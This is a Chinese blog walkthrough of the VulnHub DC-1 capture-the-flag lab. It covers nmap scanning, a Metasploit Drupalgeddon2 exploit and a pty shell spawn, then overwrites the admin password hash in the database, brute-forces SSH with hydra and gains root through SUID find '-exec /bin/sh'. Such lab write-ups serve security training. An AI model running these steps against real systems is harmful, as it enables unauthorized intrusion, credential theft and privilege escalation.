Vulnhub靶场 | DC系列 - DC1

于 2024-07-13 17:50:37 发布
阅读量1.1k 收藏 16
点赞数 26
文章标签: 靶场 DC系列 DC-1 Vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45305211/article/details/140403332
版权

https://www.vulnhub.com/series/dc,199/

环境搭建

  1. 靶机镜像下载地址:https://www.vulnhub.com/entry/dc-1,292/
  2. 需要将靶机和 kali 攻击机放在同一个局域网里;
  3. 本实验kali 的 IP 地址:192.168.10.146。

渗透测试

1. 信息收集

使用 nmap 扫描 192.168.10.0/24 网段存活主机

┌──(root💀kali)-[~/桌面]
└─# nmap -sP 192.168.10.0/24

在这里插入图片描述

分析可知,靶机 ip 为 192.168.10.147

对靶机进行端口扫描

┌──(root💀kali)-[~/桌面]
└─# nmap -sS 192.168.10.147

在这里插入图片描述

由结果可知,靶机开放了ssh、http和rpcbind服务。

探测对应服务的版本信息

┌──(root💀kali)-[~/桌面]
└─# nmap -sV -p22,80,111 192.168.10.147

在这里插入图片描述

web 指纹识别

┌──(root💀kali)-[~/桌面]
└─# whatweb http://192.168.10.147

在这里插入图片描述

发现该网站是 drupal[//]: # (Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。),属于 cms 系统之一。

访问网站看一看…
在这里插入图片描述

也可以使用wapp插件查看网站基本信息。
在这里插入图片描述

很明显,我们看到网站的 cms,可以直接在网上搜索这个 cms 的漏洞利用方式
在这里插入图片描述

2. 漏洞利用

使用 metasploit 对漏洞进行利用。

启动 metasploit,搜索 drupal 模块。
在这里插入图片描述

经测试可以采用exploit/unix/webapp/drupal_drupalgeddon2,即:

配置参数(payload、rhosts、lhost),开始攻击,成功建立会话。
在这里插入图片描述

查看网站目录结构,发现 flag1:
在这里插入图片描述

查看 flag1.txt内容,有一个提示信息:需要一个 config file
在这里插入图片描述

进入系统的 shell,并使用python -c "import pty; pty.spawn('/bin/bash');"获得一个交互shell。
在这里插入图片描述

根据上面flag1.txt的提示,在网站目录中寻找相应的配置文件(当然没有提示,也应该寻找看一下,毕竟是敏感文件)。
在这里插入图片描述

内容如下:发现flag2、数据库名、用户名、密码
在这里插入图片描述

flag2提示:“暴力和字典攻击不是获得访问权限的唯一方法(你将需要访问权限)。你能用这些证书做什么?”

使用获取的数据库用户名和密码登录数据库:
在这里插入图片描述

发现该用户只能管理drupaldb数据库。进入数据库,查看库中的表
在这里插入图片描述

发现有个users表
在这里插入图片描述

查看 users 表中的内容:由于列数比较多,查看内容比较乱,可以使用select * from users\G;查看
在这里插入图片描述

或者:先看看表结构
在这里插入图片描述

查看name和pass列
在这里插入图片描述

该密码不是普通的加密,有可能是网站自己的加密方式。尝试搜索一下相关文件~
在这里插入图片描述

搜索到了一个./scripts/password-hash.sh看似与密码有关。查看文件内容,得知为php脚本,作用是生成一个hash密码。
在这里插入图片描述

使用该脚本生成一个简单的密码,比如123456。将数据库中的密码覆盖掉~

www-data@DC-1:/var/www$ php  ./scripts/password-hash.sh  123456

在这里插入图片描述

覆盖 admin 的密码:

mysql> update users set pass="$S$D3JWVJTOOlXIz0t1Nf.8eg5MrBOqhCVsn.z7m/P4wf4H.OoLYlAf" where name="admin";

在这里插入图片描述

登录网站:
在这里插入图片描述

登录成功。
在这里插入图片描述

在 Dashboard 中发现 flag3 给的提示:

Special PERMS will help FIND the passwd - but you’ll need to -exec that command to work out how to get what’s in the shadow.

特殊的PERMS将有助于找到passwd-但您需要执行该命令以确定如何获取shadow中的内容。

在这里插入图片描述

查看 /etc/passwd 文件。
在这里插入图片描述

发现 flag4,flag4是一个普通用户。

尝试查看flag4用户的家目录,确实存在flag4.txt文件,
在这里插入图片描述

提示信息为:在root里?

Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy.  Or maybe it is?

当然如果没有权限访问/home/flag4/flag4.txt,则需要登录flag4用户。由于该服务器也开放了 22 端口,我们可以使用hydra工具爆破flag4用户的密码:

┌──(root💀kali)-[~/桌面]
└─# hydra -l flag4 -P /usr/share/john/password.lst 192.168.10.147 ssh

在这里插入图片描述

爆破结果:密码为orange。

使用 ssh 连接,发现最后一个 flag 的提示信息:in root。

进入 root 目录,发现权限不够,需要提权

在这里插入图片描述

3. 提权

首先想到使用 suid 提权找到一个属于 root 的有 s 权限的文件。

  • SUID(Set User ID),SUID 可以让调用者以文件拥有者的身份运行该文件,所以我们利用 SUID 提权的思路就是运行 root 用户所拥有的 SUID 的文件,那么我们运行该文件的时候就得获得 root 用户的身份了。

常见的可用于 SUID 提权的文件有:

find、bash、nmap、vim、more、less、nano、cp 
//当没有s权限时可以使用:chmod u+s 命令路径,增加权限

查找哪些命令具备 SUID 标识

相关命令:

find / -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

使用find命令进行提权:

利用 find 命令随便查找一个正确的文件(夹)路径,后面加上 -exec shell 命令 \;

提权 /bin/bash 或者 /bin/sh

www-data@DC-1:/var/www$ find cron.php -exec "/bin/bash" \;
find cron.php -exec "/bin/bash" \;
bash-4.2$ find cron.php -exec "/bin/sh" \;  
find cron.php -exec "/bin/sh" \;
# whoami
whoami
root
#

在这里插入图片描述

成功提权!拿到最后一个 falg!
在这里插入图片描述

Reference:DC-1

_leyilea
关注
  • 26
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VulnHub靶场系列:Flick
快吃小蛋糕吧的博客
10-03 1238
VulnHub靶场系列:Flick 今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来。 环境部署: 下载靶场并导入到VMware中: https://download.vulnhub.com/flick/flick.tar.gz 实战: 首先使用工具扫描整个网段得到靶机IP: fping -g 192.168.142.0/24 得到靶机IP后使用Nmap工具检测服务器开放端口: nmap -sV -p1-65535 192.168.142.35
VulnHub靶场系列:Chili
快吃小蛋糕吧的博客
10-05 1352
VulnHub靶场系列:Chili 刚刚在VulnHub官网上找了些简单的靶机,感觉这个还挺适合新手的 环境部署: https://download.vulnhub.com/chili/Chili.ova 实战: 首先使用工具扫描靶机所在网段,得到靶机IP: root@kali:/# nmap -sP 192.168.200.129/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 08:56 CST Nmap scan report f
VulnHub----DC1靶场记录
x1871329637的博客
04-26 3220
00-环境介绍 靶机下载地址:DC: 1 ~ VulnHub 攻击机:kali2022:192.168.200.129 DC1:192.168.200.135 目标:拿到5个flag 1由于这是一次黑盒测试所以只能根据目标mac地址来确认靶机的ip信息 由此判定靶机ip为192.168.200.135 2nmap直接扫 nmap -A 192.168.200.135 -p 1-65535 由此可见开放了22 80 111 42892端口,可以先去访问一下80端口 .
vulnhub靶场实战:DC-1
huangyongkang666的博客
04-18 4486
vulnhub实战:DC-1 1.DC-1介绍 DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。 总共有五个flag,但最终目标是在root的主目录中找到并读取
Vulnhub系列DC1靶场详解
weixin_54960572的博客
08-09 334
提示-exec,linux中的 exec命令,-exec 后面跟的是linux的 command 命令,exec命令以分号结束;目录是用于存储用户密码信息的文件目录,也被称为“影子文件”。该目录只有root用户拥有读权限,其他用户不能直接查看或修改该目录下的文件。因此,这个命令的作用是在Linux系统的根目录下找到所有文件,并以管理员权限在每个文件上执行Bash shell。若不指定,则修改表中所有的行。尝试验证后发现编号为1的exp可以利用,选择进入。提示shadow,在Linux系统中
DC靶场系列--DC1
BGiscool的博客
06-28 4876
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
vulnhub靶场】-dc1
weixin_43446292的博客
04-13 352
1、环境配置: kali:88.16.153.33 dc1:88.16.153.36 补充:kali需设为桥接模式,因为dc靶机打开需要登录,kali设为桥接模式后与dc1在同一个局域网内,可以在kali中扫描得知dc1的ip地址;dc1的下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 需要找到5个flag.txt 2、信息收集: 2.1 使用arp-scan -l,探测存活主机,也可使用nmap 88.16.153.33/24(较慢) 2.使用nmap查询开
Vulnhub靶场----1、DC-1
七天
02-21 488
Vulnhub靶场
vulnhub靶场DC-1 思路详解
weixin_62369433的博客
09-24 485
快速入门学习vulnhub靶场
Romax学习资料-DC1模块-载荷谱处理
03-14
### Romax学习资料-DC1模块-载荷谱处理 #### 一、直方图法 ##### 1.1 简介 在Romax软件的DC1模块中,直方图法是一种常用的载荷谱处理方法。这种方法主要用于对原始数据进行统计分析,并通过构建直方图来获取不同...
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
docker-compose version 1.23.0,build c8524dc1
09-01
centos7安装docker后,并没有安装docker-compose,而且很多源里没有,无法通过yum安装,wget github的源码,有时候会很慢,这里提供一个现成的,源码编译好的docker-compose。centos7安装docker和docker-compose,...
esp_dc1:DC1插线板固件
04-14
ESP DC1斐讯DC1智能排插个人固件.WHY众所周知的原因,斐讯服务器已经不能正常访问,插座的APP控制已经无法正常实现,需要有另外的方式实现插座的控制。已有的方法为内网劫持实现,具体可参考。这次要实现的是通过一...
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
ASP仓库货物管理系统的设计与实现(源代码+论文).rar
08-10
资源包主要包含以下内容: ASP项目源码:每个资源包中都包含完整的ASP项目源码,这些源码采用了经典的ASP技术开发,结构清晰、注释详细,帮助用户轻松理解整个项目的逻辑和实现方式。通过这些源码,用户可以学习到ASP的基本语法、服务器端脚本编写方法、数据库操作、用户权限管理等关键技术。 数据库设计文件:为了方便用户更好地理解系统的后台逻辑,每个项目中都附带了完整的数据库设计文件。这些文件通常包括数据库结构图、数据表设计文档,以及示例数据SQL脚本。用户可以通过这些文件快速搭建项目所需的数据库环境,并了解各个数据表之间的关系和作用。 详细的开发文档:每个资源包都附有详细的开发文档,文档内容包括项目背景介绍、功能模块说明、系统流程图、用户界面设计以及关键代码解析等。这些文档为用户提供了深入的学习材料,使得即便是从零开始的开发者也能逐步掌握项目开发的全过程。 项目演示与使用指南:为帮助用户更好地理解和使用这些ASP项目,每个资源包中都包含项目的演示文件和使用指南。演示文件通常以视频或图文形式展示项目的主要功能和操作流程,使用指南则详细说明了如何配置开发环境、部署项目以及常见问题的解决方法。 毕业设计参考:对于正在准备毕业设计的学生来说,这些资源包是绝佳的参考材料。每个项目不仅功能完善、结构清晰,还符合常见的毕业设计要求和标准。通过这些项目,学生可以学习到如何从零开始构建一个完整的Web系统,并积累丰富的项目经验。
qt下载安装及配置教程的个人学习资料,欢迎使用
08-10
qt下载安装及配置教程qt下载安装及配置教程。内容来源于网络分享,如有侵权请联系我删除。另外如果没有积分的同学需要下载,请私信我。
2019年玖富庄园复利农场 拆分理财复利模拟经营游戏源码美化版
08-10
2019年玖富庄园复利农场 拆分理财复利模拟经营游戏源码美化版 玖富农场是一款跟QQ农场一样的种菜游戏,手机,电脑都可以玩。每天不耽误时间。只需花几秒时间收菜,把菜卖掉就是现金。一天轻松赚取50到500元不等。 1.通过您的推荐链接/推荐码注册的会员,将成为您的推广会员。 2.您将享受推广在玖富庄园每次所兑换砖石的10作为奖励。 使用说明: 1.复制上面的推广链接或推广码,并发送给好友。 2.好友通过链接进入注册页面进行注册,将成为您的推广会员。 3.好友在玖富庄园注册页面填写您的推荐码完成注册,将成为您的推广会员。
毕业设计javajsp中药药方管理系统ssm-qlkrp源码工具包
最新发布
08-10
毕业设计javajsp中药药方管理系统ssm-qlkrp源码工具包 后台是ssm框架,页面是jsp,数据库mysql,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 药房人员管理 医生管理 药材信息管理 药方管理 包含:源码、数据库脚本、环境工具包、相同框架项目的安装教程(在说明文档中)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值